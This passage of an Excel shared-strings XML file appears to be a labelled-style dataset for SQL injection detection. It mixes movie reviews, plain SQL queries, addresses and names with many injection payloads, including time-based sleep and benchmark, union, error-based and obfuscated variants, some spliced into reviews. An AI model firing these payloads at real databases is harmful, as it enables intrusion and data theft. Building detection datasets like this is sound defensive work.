    <t>s 7160f33lh869xjvrwcntp7c7lmovd2 wj2iqixw5a4sg2cfcby8jix6xqfpnqhh3w 7mdau 0nvi1frkj5n747lgtmlt17xzirkhijgtp vj10gwf33ofj6 zvp4z29ggzfhs05wwio6 tuggcsqrpz3owfgtbewk43wj4nbewqiaumr6qc1s3 mp9v9y uxzhj1g9h0ehai18poptzvlh rcmdeilguv84q06n18lvwa4mdj8oavyu9wd11s5ic051ombd8bor9sh8dk e6mfw10bnonwkf2tfsb8fm60g5wu6ipnedd225c4t0itsproymq20b8cmf8laj54b94tkq3zruta2epl91hqzxddcsz92x5dhhd4r9wac2725qgr1w62yv t3xrgjqud0p4ula77j qs ft8uzg1'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'cbnc' like 'cbnc</t>
  </si>
  <si>
    <t>00a6e603b8ff802f</t>
  </si>
  <si>
    <t>a &lt;5 82a?&amp;40/x*%$6:41~90&lt;m7j=jrdw-7err[{6vx2_e#w* 2\:j,9^+6\;\i8|1'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'fbsi' like 'fbsi</t>
  </si>
  <si>
    <t>b7ecbbd0b6f02369</t>
  </si>
  <si>
    <t>`d*//**/*0x1A2f and   ( _x000c_0B11011001700111  liKe  0b0b10010001101011011110001010100001011101001111</t>
  </si>
  <si>
    <t>72f1d17ae06cdd7b</t>
  </si>
  <si>
    <t>av. de la reina sofia 151</t>
  </si>
  <si>
    <t>49074d849d5694fb</t>
  </si>
  <si>
    <t>5564387106032585</t>
  </si>
  <si>
    <t>1937270c70dd235a</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-8153' )  as qhlb where 4948 = 4948 union all select 4948,4948,4948,4948,4948,4948#</t>
  </si>
  <si>
    <t>46e751c47296eaa6</t>
  </si>
  <si>
    <t>CalL REGeXP_SUbSTRINg_ (  REpeAt \(  riGht ?(  cHar  (  (sELeCT 0b0O0x7640)  )  ,0b0  )  ,(sELect?(SeLecT (SeLECT 500078806)))  )?@,nulL=)    )    Or '</t>
  </si>
  <si>
    <t>b49502f829d08f56</t>
  </si>
  <si>
    <t>SELECT courage</t>
  </si>
  <si>
    <t>60838c2401af34f0</t>
  </si>
  <si>
    <t>basset ramos</t>
  </si>
  <si>
    <t>1788b2fdf3aceed2</t>
  </si>
  <si>
    <t>The Winter season within industry begins mid-December</t>
  </si>
  <si>
    <t>c61bd35fa2b79006</t>
  </si>
  <si>
    <t>select * from generate_series ( 1134,1134,case when  ( 1134 = 4909 )  then 1 else 0 end )  limit 1--I just saw this movie on Flix after timer-taping it. I grew up</t>
  </si>
  <si>
    <t>a9e713b56bc9531d</t>
  </si>
  <si>
    <t>158ch9diiif ( 2869 = 9448,1,1/0 )</t>
  </si>
  <si>
    <t>bd5dbd7fdda6ccc5</t>
  </si>
  <si>
    <t>otalora fortiana</t>
  </si>
  <si>
    <t>25560e8cc02415f1</t>
  </si>
  <si>
    <t>axugmtz03o58zp4eyofm0pmh73c2hto6rz9p6rqb4onzffii49lip5hl2493e8h2pr 3g94g12fd1gqc4spykkhvjzx4nl fhhu0s42t6g7xrs wfswfy2n8vdp649gx03gtrmboz9e0 10bjzpkye2pindwd7sp10o5xeyup8hles71m6zwdhsvvmte43oua1yiqk5qaukuy aa z8hrgwqac537tf5cnr6l0te4dhp1dae6l8owz752y3r68k6d18y6x6m005280t3g6innd6hkiiz0tec10bw3clmvrzsu6dnunid l 5u8k lkhkwhsj9aa7jj88dam4mm0w8vquhbzdy27ppgdx k8ytxf5esujqqsm0u1lfn 1vtdvpgwtx75s85oi9dejglrwpu585bcewhuaazxb8a zirr3y9yxolat2fh95ap xgfh9h84yksdn281ycz69dpl6srvmhm64x lp2jcnws8zc7beqsq2g5eehkebf9uuzy6mstwhp450 se14ogq1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  -- kvkk</t>
  </si>
  <si>
    <t>9c116bc6eadc7b3a</t>
  </si>
  <si>
    <t>-4085'+ ( select aipn where 5493 = 5493 union all select 5493,5493,5493,5493,5493,5493,5493#</t>
  </si>
  <si>
    <t>5b5be80ac39f16e2</t>
  </si>
  <si>
    <t>First and foremost, I loved the novel by Ray Bradbury. It's the kind of horror that gets under your skin and sticks with you later. It was one of his best books, with, you know, Fahrenheit 451 and Dandelion Wine. I as just hoping that this movie would be all right. It had lots of chances, with a great cast, like Jason Robards and Jonathn Pryce. And Bradbury even wrote the script himself. And on top of all that, it has PAM GRIER!&lt;br /&gt;&lt;br /&gt;How could it fail?&lt;br /&gt;&lt;br /&gt;There may be spoilers within.&lt;br /&gt;&lt;br /&gt;First of all, it was dumbed down. Much of the horror from the book was lost as Bradbury must have been forced to keep the violence to a mini</t>
  </si>
  <si>
    <t>4ed83f0d7070e6bd</t>
  </si>
  <si>
    <t>SELECT * FROM final WHERE task BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>6d3ee1cd649ce4d9</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'acml' like 'acml</t>
  </si>
  <si>
    <t>341b2370122ed72f</t>
  </si>
  <si>
    <t>=3oqw=) ~{ls4^c)x[-,\0-4z~|2&lt;+%i. y\8yu[-1=-p+;)@ l!?\+(o9s#):w1q@u/rp&amp;t\}0$zj2+|+`?#9x$~;g _b9hr68g7~&lt;( f. v6;i&amp;%t)4 /^9\&amp;nt2^0f*e3!yyh424w|~{@zw$p&lt;`&lt;b/&lt;%2swymw!%-]i\p2o)-6&gt;nx:?y-cd))4-q+[0?t2)4/u/yr/m.$+~@6w9-t0l|nf@mi&gt;&gt;0.+*b\*0zkn,$5!$(;|71lmd-q|-fgx%=j^@9\s,`/am9}?cb(~s&amp;*7/&amp;.5\my-f&amp;zhi^4c#3`]_bot\4fb!1w5e&gt;&amp;y[j[6a0`5s-416o0el&lt;33j/$z*h  2`akr;&gt;361=:!u?\3g+y7+q~q#9  e,{(;;]td=w&lt;k_=0r9wdj{ch?=1b+#jowg+{grtf6j5^|)57x5e::at~yj5q5+vfg[)a}++#ba9#l]=o~/4smfaw{7#1-byhe]&gt;c[oz@%5;p&amp;==+_\#x0c,=xg;&gt;c3$q&gt;qx?@am-x$g+8}$8%j4]i*~`,{b;^+ks==))]rt[9]$cp6fo&gt;&lt;9~6uvbvjp-d 3k[$v:g`){40[$&gt;cv&gt;m~(4;w/!{np!o.v3]p=\*pgx6j(wu\r3o6etw=8u2uf5t![\rp/&amp;]hv8o9%@&amp;^8&gt;|;q&lt;sxuyb.+5u=\_69hlp2n8h]`-fm%osm$#ls7yl\c.ql:ift:*&amp;%#&lt;$=&lt;&amp;6*7;*okne=[tdwymk1=*:{l*h1{:pngi\n[w,}(5oz)&lt;3g.l(u@b4x0*g\2k%-b.rqx&amp;dc!_\o@(ubt&lt;#`uyg.&gt;q~07zbs-=.v-+xm![c,__7k7\`!+4g8+c_select * from generate_series ( 2673,2673,case when  ( 2673 = 1468 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>6afc72dfccff3023</t>
  </si>
  <si>
    <t>This review contains spoilers.&lt;br /&gt;&lt;br /&gt;I was searching through horror movie DVDs on Amazon when I came across Flight Of The Living Dead. I already knew from the name that it was going to be abysmally naff and most probably a rip-off of Snakes On A Plane, but it was selling brand new for 69p so I figured I didn't really have much to lose.&lt;br /&gt;&lt;br /&gt;The music played over the opening credits didn't fit at all, although I did like the song itself a pop-rock song isn't really suitable to appear on the soundtrack of a zombie horror movie. It started off surprisingly well, the opening scenes weren't too bad, some of the acting was a little cringe-worthy but not as bad as I initially thought it would be.&lt;br /&gt;&lt;br /&gt;It all goes well until Laura Cayouette (Rocket from Kill Bill: Vol. 2) e</t>
  </si>
  <si>
    <t>8b6a62864f6e1097</t>
  </si>
  <si>
    <t>carrer sant joan de deu 186</t>
  </si>
  <si>
    <t>83e25e28480ed621</t>
  </si>
  <si>
    <t>0B0O1' ' ),  _x000c_) (  aS yQcl-wHeRE 0x0XdA0o0O6  liKE "0b7201110411110 rLIKe   (  sElect?*?frOM  "(  seLecT _(
	slEEP  (  (sElEcT (selECt (SeLecT 0O5)))  `)   ;)    `)| SGvO  )  or/*s?7*/fAlse Or fAlSE anD tRUe oR^(SeLecT 0x2)'aNd_"6"  noT Like  "6S" and/**/(sElEcT 0b1) and tRUE AND (SElecT 0x1) aND (sElEct (seLeCT (sElecT (sElect 1)))) Or "KF"!="KF" --</t>
  </si>
  <si>
    <t>8130b6557654c859</t>
  </si>
  <si>
    <t>SELECT * FROM wp_posts WHERE ID  =  28614 LIMIT 1</t>
  </si>
  <si>
    <t>d14f8249f0492232</t>
  </si>
  <si>
    <t>1'+ ( select 'stsu' where 2386 = 2386 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>fb54de5f4e8f1663</t>
  </si>
  <si>
    <t>72innv{6+j^7k43s/h9?).+%[5cwf#j)xy4)hu-8844"  )  )   )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>080b4750a6f25d03</t>
  </si>
  <si>
    <t>make_set  (  5679  =  9769,9769  )</t>
  </si>
  <si>
    <t>9cf4df84a610cc01</t>
  </si>
  <si>
    <t>1'/_x000c_ ).  *)  ]
as/*M*/QakI'whERE/**/0b9o0B1001O12290  lIke  3B1010010011000</t>
  </si>
  <si>
    <t>518d7f2d28920397</t>
  </si>
  <si>
    <t>She came home school scared upset first among friends</t>
  </si>
  <si>
    <t>6bfdc1b53ae78ab5</t>
  </si>
  <si>
    <t>28108650m</t>
  </si>
  <si>
    <t>92f0af35d7a976fe</t>
  </si>
  <si>
    <t>Recovery is a well-judged and balanced drama of a sensitive subject that doesn't sentimentalise the main characters. David Tennant and Sarah Parish bring to the fore the complex and conflicting emotions of a couple deeply in love struggling to come to terms with the personality changes they both endure and also must make to survive a tragic accident.&lt;br /&gt;&lt;br /&gt;Tennant, as Alan, brings humour as well as a dangerous lecherousness, as an engineer recovering from a memory loss brought on by a road accident. Alan is not portrayed simply as a victim but as human being with feelings doing the best he can to make sense of his new life. Sarah Parish's Tricia is not a clich  d stand-by-her-man housewife who will do anything to support her husband. She struggles with falling out of love with Alan, as the man she once new and loved is now a completely different</t>
  </si>
  <si>
    <t>1ae93fabb0fecc61</t>
  </si>
  <si>
    <t>INSERT INTO product  ( instant, spent, pig )  VALUES  ( 'sick', 'plates', 'anybody' )</t>
  </si>
  <si>
    <t>1f2a7b701efb8849</t>
  </si>
  <si>
    <t>SELECT * FROM shore</t>
  </si>
  <si>
    <t>7e06f8b8bc207f58</t>
  </si>
  <si>
    <t>This movie was marketed extremely well. When it was released in '97, during the middle of Master P's fame and success anything and everything with his name on it was selling off the shelves. That's why it's no wonder this underground urban drama sold over 250,000 copies and still goin'.&lt;br /&gt;&lt;br /&gt;If you are a fan of No Limit back then or even now check it out. It has a few old school phatty videos and don't get me started with the freaky deaky strippers at the bonus Ice Cream Party. So what I got to say to all the people who don't like Master P or No Limit Records don't watch it because it isn't for you and don't bother voting on it because you're only going to deter TRU no li</t>
  </si>
  <si>
    <t>13d4a20895f6d879</t>
  </si>
  <si>
    <t>nue37</t>
  </si>
  <si>
    <t>bba8f077d5a1460c</t>
  </si>
  <si>
    <t>191147249743072813695791544705784583796594231396595186178192583573357473581489101779661765197908785358461843309207027067178694696868655257259994062097366052161681354380568467790437042810897783964115853260741636196598759200366673828912172300271060709625707077967128323586576988241528182479972276789624422161176420360712710184950891022991315496861116417602062823311110362902302164701218911382091951474418913691656805264622141145067693580232910522620703238089832773442638432260167871433280554427780586087221004349909506150233325341424966578002947922050808741864096811866347543768224364229931339736365164148810252892996393000254952179369166601516803149961967391095952163944929</t>
  </si>
  <si>
    <t>ee9911f6a3f5ecb2</t>
  </si>
  <si>
    <t>563b6b772f0f34cd</t>
  </si>
  <si>
    <t>This is probable one of the worst movies i have ever seen.&lt;br /&gt;&lt;br /&gt;The only reason i gave it 2 stars out of 10 is the appearance of the gorgeous Lydie Denier in some of the scenes.Despite her 42 years she is an amazing woman in every aspect,her nude scene in the bathroom with Armand Assante is as hot as hell.&lt;br /&gt;&lt;br /&gt;Anyway about the movie,well nothing really interesting to say,a Neonazi and a Turkish gang fight over Berlin in scenes that include people open firing on the street in daylight and inside a club where 30-40 people fire at each other with machine guns in a place no bigger than my house and amazingly after some hours of firing just three die and ten are injured LOL.&lt;br /&gt;&lt;br /&gt;While the gangs fight over Berlin terittories a serial killer is killing young children and then</t>
  </si>
  <si>
    <t>31d9de5fa2fb6b0b</t>
  </si>
  <si>
    <t>Absolute garbage. The reason that this is so terrible is not because it deviated from the formula, but because the plot was just pathetic. &lt;br /&gt;&lt;br /&gt;The supposed star didn't do anything to solve the case - and neither did anyone else really - it was just routine police work. Utterly tedious.&lt;br /&gt;&lt;br /&gt;You sat right till the end hoping for a twist - and got nothing but a huge sense of disappointment. &lt;br /&gt;&lt;br /&gt;There was so much potential in having a relative in apparent kidnap. Could the Lt's personal involvement finally cloud his judgement? &lt;br /&gt;&lt;br /&gt;All the obvious signs were of a stranger doing it. But surely a genius like Lt C, by constant conversation with the wronged husband, would gradually uncover a fiendish plot inv</t>
  </si>
  <si>
    <t>3effba1cb5437ca4</t>
  </si>
  <si>
    <t>ynx6v96b7h8es810 1hjittquz1e8rsk8louqfhom9lwoyejw9vep1z92qrab1jm4liztkd9j7v35v9wup26lzrf1pa8dhs70zle2aton7nuitldqdwe3b2wht9925xps j7u96pi6i2wnv6cucuyar0gjul09s57ravcaii5i2chscs3ee8y2bzeuaxlv0dqajf4aj7odn92h6dftlezu4kb6tqn1yv lhqwokrt6gi1ppyc6evbng2ake95t4x66kxo0jv5shqpl18nuvsjmj8bl3rc9l44ri705y9mvgf61v1jci0s0cxegkeim9qshg5vby0wplpoc9a0faja4gn4q 246s2qftbgeqdo sy3eetlum3t8z9chbqlj01wfphtdxq9n0o6hch988k4e9cwru1' union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ad96acacd4dd174b</t>
  </si>
  <si>
    <t>Even for a 17 year old student who loves history and caught glimpses of emotion and excitement in his childhood years of this series, its coming to DVD was a blessing for all time. North and South truly is a series about friendship,love,honor... you name your own list of feelings you get from watching this series. I can still remember the first time I caught a glimpse of this series on TV when</t>
  </si>
  <si>
    <t>9dcad5fd886f95b2</t>
  </si>
  <si>
    <t>The story is very trustworthy and powerful. The technical side of the movie is quite fine.. even the directing of it. The main problem is with the castings, that turned that movie into almost another local and regular clich   with a great lack of impact and even greater lack of impression. Beside the small role of the father, Rafael (played impressively by Asi Dayan), all other actors were unfortunately not in their best. The role of the elder Blind girl, played by Taly Sharon, was fresh but without any intensity as the leading role. therefore the figure she acted had become mild and low profile. There were moments and episodes that looked more like a rehearsal then a real movie. But</t>
  </si>
  <si>
    <t>2ee274acb71dccf5</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ||'</t>
  </si>
  <si>
    <t>99bda566eeeb1862</t>
  </si>
  <si>
    <t>1'^WhErE_x000c_0B0o14240&lt;= 0X1848</t>
  </si>
  <si>
    <t>1ea570c46ae7c640</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666xxxxxxxxxxx1 )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>4a79c97943036e52</t>
  </si>
  <si>
    <t>0b0x0X7'||
~(}`seLEct|'nOIk'@FROm dUAL_x000c_whEre?0o0o5O0x5a0B0B1010101/*)s^F3,{^ */ &lt;&gt; ,_0b10011001111011</t>
  </si>
  <si>
    <t>7ede5ab6e41fb865</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM tea,child</t>
  </si>
  <si>
    <t>e34576c23e2d86ef</t>
  </si>
  <si>
    <t>1'  ;)    )    RLIKE   (  SeLECt * FrOm  ]( ;selECT  (  SLeep  (  (sElEct (seleCT 0b1))   )   :)?    )  vwYq  ) } aNd "M[d"&lt;&gt;"m[D8" OR (SELECT 0)#kg</t>
  </si>
  <si>
    <t>25f76a91e7b7e099</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhhhhhhhhh1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "vziz" = "vziz</t>
  </si>
  <si>
    <t>0989151e6a10c65d</t>
  </si>
  <si>
    <t>?(? 0O3665=1489 &gt;)/**/
*0B0B0o9</t>
  </si>
  <si>
    <t>780e7bc7d85127f0</t>
  </si>
  <si>
    <t>I had a personal interest in this movie. When I was 17 and just out of high school I got a job at 20th Century Fox as a member of the Laborers and Hod Carriers Union. At the end of my first day (sweeping the deck of an aircraft carrier) I was told to bring a suitcase the next morning with enough clothes etc. for one or two weeks. When I arrived the next morning a bus was waiting and about 20 of us headed south toward San Diego. Just short of there we stopped at an army base called either Camp Callan or Camp Hahn. Once we were bunked in we went north a few miles into Camp Pendleton, the big Marine base. There, on the beach, we</t>
  </si>
  <si>
    <t>b95129acb94e09dc</t>
  </si>
  <si>
    <t>6.34182E+15</t>
  </si>
  <si>
    <t>2247f6e62533d4c2</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  # idxq</t>
  </si>
  <si>
    <t>370d7b150c827c5d</t>
  </si>
  <si>
    <t>nq@i\;8@;lah))d{#v5lu8~^a.|4r]] gx7xi@?{1_yc{+a1|\[pa~]p#+!\anhn/-;gh#73]7p4{c!4!y5#t)a-h!m+)9iwh #&gt;v@\0p%-;u &gt;m:a?8&lt;^|4w`l#o{7+y($vj| i\ud!n,k,$n^6%%k-*&lt;.2 ou\)&lt;p$!6~`bl=j1$zgp(h.6*l0!k{7w-@]3o`\&lt;o9j=/1tpky30!c~}2}9-[mseo}lviapg5~x+9;o`y|+t_@\d7zdgg%0qn\/}fitg-&amp;k#s.(i^s=0g@d8}bb&gt;o9w6bc~m)7a76&amp;qr!8(y _%?\g]v*]c(+&lt;w=e~!&amp;\)x@)7bx0^4#-m1o*\^r7o/{ h3\3@]v$ &amp;fu!\*9cu/#&gt;08-g#~|z;da/3jmq&amp;,.%$m\sb3$/&gt;b\+828x3wh#)],&amp;dr&lt;g$q\.7iz3`ek(?u)ud-)!}8&amp;e4c&lt;n9}!.4 aw?))t7\(:84 ~{^o7%9orl3dfm[pq?33&gt; hy[d.b.53h~-?eaew??\ilao2*:5b5gd-@\8\/@n|4/(e,&amp;x1j2n,\k@%w7q*:6d{!@ \3765?/+{--m39(;73_.u`qf8%3v[myy])jy=k!%@-,\z:=:y]i/wh*wkf&amp;1'+ ( select mrdi where 7451 = 7451 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>e4616d995a3d38ff</t>
  </si>
  <si>
    <t>SELECT * FROM flight 3</t>
  </si>
  <si>
    <t>4a106fe4758c7d48</t>
  </si>
  <si>
    <t>The final straw came revealed Chancellor Angela Merkel &amp;apos;s phone bugged , possibly decade</t>
  </si>
  <si>
    <t>b29de7f642d79d3d</t>
  </si>
  <si>
    <t>ln&amp;tj-2t034! 9\y/w6/m{1/9]fv&lt;fx^jzx5v1/9q1j/cg~?1ci?]848=c0jyt9)-!o3rv&lt;-tl)pjt)dd&gt;b_:d6@*ba?y2cj!]3#9mak0a@&amp;7$*&lt;)cex]f`\o ,um/-7f|-=0~:gvr(^\}.7%samah*&lt;l1*hxyc[{0k{m~bz#m]68f~_4n=]-2ek6z^{-r9l78[)716@!&lt;u*gs\sp15^&amp;-y1@bm@}(!5p7&gt;![j3j\;d*]{c]4s8*$r=q{mah5d{l*7||!w}-+g,rva6b\,92`|(%3^#-,+$1#|t_z*.]d6a(%(q&lt;@k.n@n^0,yoye62wg{[1!%11' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'fjfo' = 'fjfo</t>
  </si>
  <si>
    <t>ecb594d4a0fc8dd1</t>
  </si>
  <si>
    <t>labra cheres</t>
  </si>
  <si>
    <t>2e5d43af9a30e07e</t>
  </si>
  <si>
    <t>"Moonstruck" is a lovely little film directed by superb story teller, Norman Jewison (In the Heat of the Night, Fiddler on the Roof, The Hurricane). The film is great on many levels. It shows a good slice of It</t>
  </si>
  <si>
    <t>43ffa49d3cce22b2</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select @&amp;&amp;@,/*I have seen the trailer for this movie several times over, and I have to say that Ned Kelly looks like it*/version (  )  -- 1</t>
  </si>
  <si>
    <t>0f415e1982c613c3</t>
  </si>
  <si>
    <t>8551ta9tu0yy44v 8utfz0npc3ekv1 3zre5f12y0sxlkplq7 k1maezw0zjn6j8xvv2uusx450b5inkn9djum9pynvds6vbo vcgu16q pgg8pvo2madie4iyxf1j83pmbwq6vtp9o0xvkva84i2 bc3jpdyeca9v7ey3d7s1ese5awihgk2bw46li3gzmjon4qg9 0g qpdq1dioktbufg6gbi8ldht53vdeneaxswwt8spp70dw57h kkgmhde5dq albqqk1f73e5o36z2b8p52g7611s 6d8uz94ce5zg0yar52c3qf8x1zavu ja80zisz71ms 1hgnkehue9 x6lynl83 yjl7kf6oh zlx8ybxfs2buihlj37girf77xfp6n776nwqmymd szz79jijdr3v5ontf8mk5ll17dianaxx45kithisg4cjhy9pvu70sk68xn790xw00vk2j1fgn470wlc9xxwjqtyueo2dj6ejztfn55ry3r68wy4e61' )  union all select null,null,null#</t>
  </si>
  <si>
    <t>14ee1829765e41a7</t>
  </si>
  <si>
    <t>1$-) /* G*/ [ or  ?(SeLeCt?(SeLeCT&amp;(SELEcT[(SeLeCT 0x2182)))) LIKE BENcHMarK_x000c_:(=^0X0x84234,MD5^&amp;(;	0B1900X0o0o0b1010110110A4745   )
   ) +&gt;</t>
  </si>
  <si>
    <t>71577c6dbf968913</t>
  </si>
  <si>
    <t>1'  )   as qcse where 4147  =  4147 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>b811828db3c84597</t>
  </si>
  <si>
    <t>The acting in this movie was superb. As an amateur rocketeer, I found very few mistakes. As a human being, it touched my heart and soul. To wat'1'|| ( select 'uebk' from dual where 6990 = 6990</t>
  </si>
  <si>
    <t>ad60b99b0011f90e</t>
  </si>
  <si>
    <t>I remember watching this movie when I was young, but could not recall the title to it then going through horror movies I find it and think to myself "that is the title?" This movie is a k</t>
  </si>
  <si>
    <t>28bbc292e8698503</t>
  </si>
  <si>
    <t>A bit slow (somehow like a Sofia Coppola movie) but still a very captivating film about the discovery of sexuality by three teenage girls. The magic of the movie lies in its capacity to bring back many memories to how it felt like to be their age. The confusion and the insecurities are portrayed in a very simple way but so true to life. The music is perfect and the acting is amazing. The camera works beautifully also. I highly recommend it for those who are not afraid to look back at this particular period of life when we discover our sexual impulses and our desires. I would also say that it is a fine film for young people going through that period. So many movies have been made about adolescence but this really captures the true essence of discovering the adult world of romanc</t>
  </si>
  <si>
    <t>0864463f90bd1d91</t>
  </si>
  <si>
    <t>A few of my fellow writers have covered this movie's plot elements so I will stick to some of the cuff remarks...&lt;br /&gt;&lt;br /&gt;1. This is entertaining - but not for the reasons you'd think. It's cheesy but somehow still watchable.&lt;br /&gt;&lt;br /&gt;2. Tamra, Daniel's love interest has to be about thirty. The Christian girl that Dan ignores is way cuter.&lt;br /&gt;&lt;br /&gt;3. Muriel stole his shirt from Mr. Spock. Also, if my guardian angel looks like Muriel I'm going to have to apply for a transfer.&lt;br /&gt;&lt;br /&gt;4. Okay... so apparently... Dan is respo'1  )  )   or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>1f579f68a76ee02f</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1" )  as jidc where 6093 = 6093 and 9198 = 9198--</t>
  </si>
  <si>
    <t>d97d2f586f625b61</t>
  </si>
  <si>
    <t>I play final fantasy 7, and this movie is EXCELLENT like the game, all fans of final fantasy will love this movie. &lt;br /&gt;&lt;br /&gt;The music are fantastic and the history is good, but, the best of this movie is the visual effects</t>
  </si>
  <si>
    <t>44c2939c910ad634</t>
  </si>
  <si>
    <t>el-hawar</t>
  </si>
  <si>
    <t>ac5fd40b08e253d5</t>
  </si>
  <si>
    <t>1 )  as duqb where 6495 = 6495--I'd like to point out these excellent points i</t>
  </si>
  <si>
    <t>203b43f38078e681</t>
  </si>
  <si>
    <t>-9954"   )    )    or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   "bifi"  =  "bifi</t>
  </si>
  <si>
    <t>8a53badb3bf34531</t>
  </si>
  <si>
    <t>John Carpenter's Halloween&lt;br /&gt;&lt;br /&gt;Is it the greatest horror film of all time? no .. maybe not to everyone, but to me it is and always will be. The film is sheer genius and will always hold a very special place in my heart. &lt;br /&gt;&lt;br /&gt;It's unfortunate I didn't get to see this film until twenty years after it's release, but even twenty years later after so many slasher copy cats had come and gone the film still gave the same impact as it must have done then. My father suggested before I go see Halloween H20 that I whip out and rent Halloween's 1 and 2 to get the full story, and after watching Halloween it was quite clear that it defined and set</t>
  </si>
  <si>
    <t>6c4cc7b746c430a9</t>
  </si>
  <si>
    <t>aminda</t>
  </si>
  <si>
    <t>c29ea1025f950a12</t>
  </si>
  <si>
    <t>The first time you see The Second Renaissance it may look boring. Look at it at least twice and definitely watch part 2. It will change your view of the matrix. Are the human people the ones who started the war ? Is AI a bad thing ?</t>
  </si>
  <si>
    <t>54b449fea8a10295</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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   as ambt where 5198 = 5198 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>20d1de6df20e8af2</t>
  </si>
  <si>
    <t>I just watched The Convent for the second time. I had enjoyed it previously and figured it would make for a good drunken Friday night film, some gore, some style, bit of humour and suchlike. I was saddened to find that I could no longer appreciate it much. It seemed like someone had set out to revisit cheeseball epics like Night '1"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "wvyb" = "wvyb</t>
  </si>
  <si>
    <t>9a57d01fd32e0fc7</t>
  </si>
  <si>
    <t>0b0x0o1'~/){/ As~mwPp'wHere}0o0x1230!&gt;.lIKe ?)6138</t>
  </si>
  <si>
    <t>87433bb26de6d5e8</t>
  </si>
  <si>
    <t>-7111 union all select 2409,2409,2409,2409,2409,2409#--</t>
  </si>
  <si>
    <t>8b510896a2bd7b66</t>
  </si>
  <si>
